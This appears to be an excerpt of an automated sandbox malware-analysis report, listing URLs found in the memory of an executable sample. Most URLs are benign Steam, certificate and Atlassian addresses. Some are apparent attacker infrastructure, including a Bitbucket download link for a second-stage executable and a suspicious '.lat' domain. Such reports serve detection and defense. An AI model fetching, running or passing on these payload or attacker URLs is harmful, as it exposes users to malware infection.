Source: jSFUzuYPG9.exe, 00000000.00000003.1450248391.0000000005E19000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: jSFUzuYPG9.exe, 00000000.00000003.1650254740.000000000169B000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000002.1976667744.000000000169F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: jSFUzuYPG9.exe, 00000000.00000003.1450248391.0000000005E19000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: jSFUzuYPG9.exe, 00000000.00000003.1450248391.0000000005E19000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: jSFUzuYPG9.exe, 00000000.00000003.1650254740.000000000169B000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000002.1976667744.000000000169F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: jSFUzuYPG9.exe, 00000000.00000003.1650254740.000000000169B000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000002.1976667744.000000000169F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: jSFUzuYPG9.exe, 00000000.00000003.1450248391.0000000005E19000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: jSFUzuYPG9.exe, 00000000.00000003.1450248391.0000000005E19000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: jSFUzuYPG9.exe, 00000000.00000002.1979443513.00000000064D9000.00000002.00000800.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1649934312.0000000005EA4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: jSFUzuYPG9.exe, 00000000.00000003.1450248391.0000000005E19000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: jSFUzuYPG9.exe, 00000000.00000003.1650254740.000000000169B000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000002.1976667744.000000000169F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0A
Source: jSFUzuYPG9.exe, 00000000.00000003.1650254740.000000000169B000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000002.1976667744.000000000169F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0C
Source: jSFUzuYPG9.exe, 00000000.00000003.1650254740.000000000169B000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000002.1976667744.000000000169F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0X
Source: jSFUzuYPG9.exe, 00000000.00000002.1976312464.0000000001640000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.globalsign.com/codesigningrootr450F
Source: jSFUzuYPG9.exe, 00000000.00000003.1650254740.000000000169B000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000002.1976667744.000000000169F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.globalsign.com/rootr30;
Source: jSFUzuYPG9.exe, 00000000.00000003.1450248391.0000000005E19000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: jSFUzuYPG9.exe, 00000000.00000002.1976312464.0000000001640000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://secure.globalsign.com/cacert/codesigningrootr45.crt0A
Source: jSFUzuYPG9.exe, 00000000.00000003.1650254740.000000000169B000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000002.1976667744.000000000169F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://secure.globalsign.com/cacert/root-r3.crt06
Source: jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
Source: jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://store.steampowered.com/privacy_agreement/
Source: jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://store.steampowered.com/subscriber_agreement/
Source: Amcache.hve.5.dr	String found in binary or memory: http://upx.sf.net
Source: jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.valvesoftware.com/legal.htm
Source: jSFUzuYPG9.exe, 00000000.00000003.1450248391.0000000005E19000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.c.lencr.org/0
Source: jSFUzuYPG9.exe, 00000000.00000003.1450248391.0000000005E19000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.i.lencr.org/0
Source: jSFUzuYPG9.exe, 00000000.00000003.1403127222.0000000005E2C000.00000004.00000800.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1403040577.0000000005E2F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: jSFUzuYPG9.exe, 00000000.00000003.1377175250.000000000165C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.steampowered.com/
Source: jSFUzuYPG9.exe, 00000000.00000003.1326717702.0000000001612000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://aspecteirs.lat/
Source: jSFUzuYPG9.exe, 00000000.00000002.1978648025.0000000005DEE000.00000004.00000800.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1650331080.0000000005EA1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aui-cdn.atlassian.com/
Source: jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://avatars.fastly.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
Source: jSFUzuYPG9.exe, 00000000.00000003.1650331080.0000000005EA1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bbc-frontbucket-canary.prod-east.frontend.public.atl-paas.net
Source: jSFUzuYPG9.exe, 00000000.00000003.1650331080.0000000005EA1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bbc-frontbucket-exp.prod-east.frontend.public.atl-paas.net
Source: jSFUzuYPG9.exe, 00000000.00000003.1650331080.0000000005EA1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bbc-frontbucket-static.prod-east.frontend.public.atl-paas.net
Source: jSFUzuYPG9.exe, 00000000.00000003.1650331080.0000000005EA1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bbc-frontbucket-static.stg-east.frontend.public.atl-paas.net
Source: jSFUzuYPG9.exe, 00000000.00000003.1650331080.0000000005EA1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/
Source: jSFUzuYPG9.exe, 00000000.00000003.1650331080.0000000005EA1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/;
Source: jSFUzuYPG9.exe, 00000000.00000003.1650331080.0000000005EA1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/
Source: jSFUzuYPG9.exe, 00000000.00000003.1650190340.00000000016A9000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1650331080.0000000005EA1000.00000004.00000800.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000002.1976312464.0000000001609000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bbuseruploads.s3.amazonaws.com/70e84e0b-e14f-45c5-ab65-07760e9609fc/downloads/eaef3307-3cc1-
Source: jSFUzuYPG9.exe, 00000000.00000002.1976312464.0000000001612000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bbuseruploads.s3.amazonaws.com:443
Source: jSFUzuYPG9.exe, 00000000.00000003.1650190340.00000000016A9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bbuseruploads.s3.amazonaws.com:443/70e84e0b-e14f-45c5-ab65-07760e9609fc/downloads/eaef3307-3
Source: jSFUzuYPG9.exe, 00000000.00000003.1650190340.00000000016A9000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000002.1976712715.00000000016AD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bitbucket.org/f
Source: jSFUzuYPG9.exe, 00000000.00000002.1976312464.0000000001640000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000002.1976312464.0000000001612000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bitbucket.org/mynewworkspace123312/scnd/downloads/FormattingCharitable.exe
Source: jSFUzuYPG9.exe, 00000000.00000002.1976145039.00000000012FB000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: https://bitbucket.org/mynewworkspace123312/scnd/downloads/FormattingCharitable.exe.0.0
Source: jSFUzuYPG9.exe, 00000000.00000002.1976312464.0000000001612000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bitbucket.org/mynewworkspace123312/scnd/downloads/FormattingCharitable.exe3
Source: jSFUzuYPG9.exe, 00000000.00000003.1650190340.00000000016A9000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000002.1976712715.00000000016AD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bitbucket.org/z
Source: jSFUzuYPG9.exe, 00000000.00000002.1976312464.0000000001612000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bitbucket.org:443/mynewworkspace123312/scnd/downloads/FormattingCharitable.exe
Source: jSFUzuYPG9.exe, 00000000.00000003.1452578134.0000000005E06000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&ci=1696500454657.12791&key=1696500454400500
Source: jSFUzuYPG9.exe, 00000000.00000003.1452578134.0000000005E06000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&ci=1696500454657.12791&key=1696500454400500000.1&cta
Source: jSFUzuYPG9.exe, 00000000.00000003.1377077229.0000000001640000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377175250.000000000165C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://broadcast.st.dl.eccdnx.com
Source: jSFUzuYPG9.exe, 00000000.00000002.1978648025.0000000005DEE000.00000004.00000800.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1650331080.0000000005EA1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.cookielaw.org/
Source: jSFUzuYPG9.exe, 00000000.00000003.1403127222.0000000005E2C000.00000004.00000800.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1403040577.0000000005E2F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: jSFUzuYPG9.exe, 00000000.00000003.1377175250.000000000165C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/
Source: jSFUzuYPG9.exe, 00000000.00000003.1403127222.0000000005E2C000.00000004.00000800.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1403040577.0000000005E2F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: jSFUzuYPG9.exe, 00000000.00000003.1403127222.0000000005E2C000.00000004.00000800.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1403040577.0000000005E2F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: jSFUzuYPG9.exe, 00000000.00000003.1377175250.000000000165C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://checkout.steampowered.com/
Source: jSFUzuYPG9.exe	String found in binary or memory: https://community.fastly.
Source: jSFUzuYPG9.exe, 00000000.00000003.1377175250.000000000165C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/
Source: jSFUzuYPG9.exe, 00000000.00000002.1976312464.0000000001640000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377077229.0000000001640000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1555875231.000000000164C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377175250.000000000165C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1496785722.000000000164C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1449663343.000000000168C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1450460913.000000000168C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1474910142.000000000168C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public
Source: jSFUzuYPG9.exe, 00000000.00000003.1377077229.000000000160C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/css/applications/community/main.css?v=Lj6X7NKUMfzk&a
Source: jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/css/globalv2.css?v=hzEgqbtRcI5V&l=english&_c
Source: jSFUzuYPG9.exe, 00000000.00000003.1377077229.0000000001640000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377175250.000000000165C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1449663343.000000000168C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1450460913.000000000168C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/css/promo/summer2017/stickers.css?v=Ncr6N09yZIap&amp
Source: jSFUzuYPG9.exe, 00000000.00000003.1377077229.0000000001640000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377175250.000000000165C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1449663343.000000000168C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1450460913.000000000168C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=EM4kCu67DNda&l=english&a
Source: jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/modalContent.css?v=WXAusLHclDIt&l=eng
Source: jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/profilev2.css?v=fe66ET2uI50l&l=englis
Source: jSFUzuYPG9.exe, 00000000.00000003.1377077229.000000000160C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
Source: jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
Source: jSFUzuYPG9.exe, 00000000.00000003.1377077229.000000000160C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
Source: jSFUzuYPG9.exe, 00000000.00000003.1377077229.000000000160C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/main.js?v=_92TWn81
Source: jSFUzuYPG9.exe, 00000000.00000003.1377077229.000000000160C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=hyEE
Source: jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLWHx5Kn&l=english&am
Source: jSFUzuYPG9.exe, jSFUzuYPG9.exe, 00000000.00000002.1976312464.0000000001640000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377077229.0000000001640000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1555875231.000000000164C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377175250.000000000165C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1496785722.000000000164C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1449663343.000000000168C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1450460913.000000000168C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1474910142.000000000168C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=gQHVlrK4-jX-&l
Source: jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalContent.js?v=uqf5ttWTRe7l&l=engl
Source: jSFUzuYPG9.exe, 00000000.00000002.1976312464.0000000001640000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377077229.0000000001640000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1555875231.000000000164C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377175250.000000000165C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1496785722.000000000164C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1449663343.000000000168C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1450460913.000000000168C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1474910142.000000000168C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalContent.js?v=uqf5ttWTRt
Source: jSFUzuYPG9.exe, jSFUzuYPG9.exe, 00000000.00000002.1976312464.0000000001640000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377077229.0000000001640000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1555875231.000000000164C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377175250.000000000165C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1496785722.000000000164C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1449663343.000000000168C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1450460913.000000000168C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1474910142.000000000168C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&l=english&a
Source: jSFUzuYPG9.exe, 00000000.00000002.1976312464.0000000001640000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377077229.0000000001640000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1555875231.000000000164C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377175250.000000000165C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1496785722.000000000164C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1449663343.000000000168C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1450460913.000000000168C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1474910142.000000000168C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/profile.js?v=GeQ6v03mWpAc&l=english&a
Source: jSFUzuYPG9.exe, jSFUzuYPG9.exe, 00000000.00000002.1976312464.0000000001640000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377077229.0000000001640000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1555875231.000000000164C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377175250.000000000165C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1496785722.000000000164C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1449663343.000000000168C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1450460913.000000000168C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1474910142.000000000168C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/promo/stickers.js?v=CcLRHsa04otQ&l=en
Source: jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/prototype-1.7.js?v=npJElBnrEO6W&l=eng
Source: jSFUzuYPG9.exe, 00000000.00000002.1976312464.0000000001640000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377077229.0000000001640000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1555875231.000000000164C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377175250.000000000165C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1496785722.000000000164C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1449663343.000000000168C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1450460913.000000000168C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1474910142.000000000168C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/prototype-1.71
Source: jSFUzuYPG9.exe, 00000000.00000002.1976312464.0000000001640000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377077229.0000000001640000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1555875231.000000000164C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377175250.000000000165C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1496785722.000000000164C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1449663343.000000000168C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1450460913.000000000168C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1474910142.000000000168C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/reportedcontent.js?v=-lZqrarogJr8&l=e
Source: jSFUzuYPG9.exe, 00000000.00000002.1976312464.0000000001640000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377077229.0000000001640000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1555875231.000000000164C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377175250.000000000165C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1496785722.000000000164C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1449663343.000000000168C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1450460913.000000000168C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1474910142.000000000168C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbC
Source: jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/webui/clientcom.js?v=St3gSJx2HFUZ&l=e
Source: jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&l=english&
Source: jSFUzuYPG9.exe, 00000000.00000003.1377077229.0000000001640000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377175250.000000000165C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&l==
Source: jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&l=engl
Source: jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=wuA4X_n5-mo0&l=en
Source: jSFUzuYPG9.exe, 00000000.00000003.1377077229.0000000001640000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377175250.000000000165C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1449663343.000000000168C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1450460913.000000000168C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=JL1e4uQSrVGe&
Source: jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
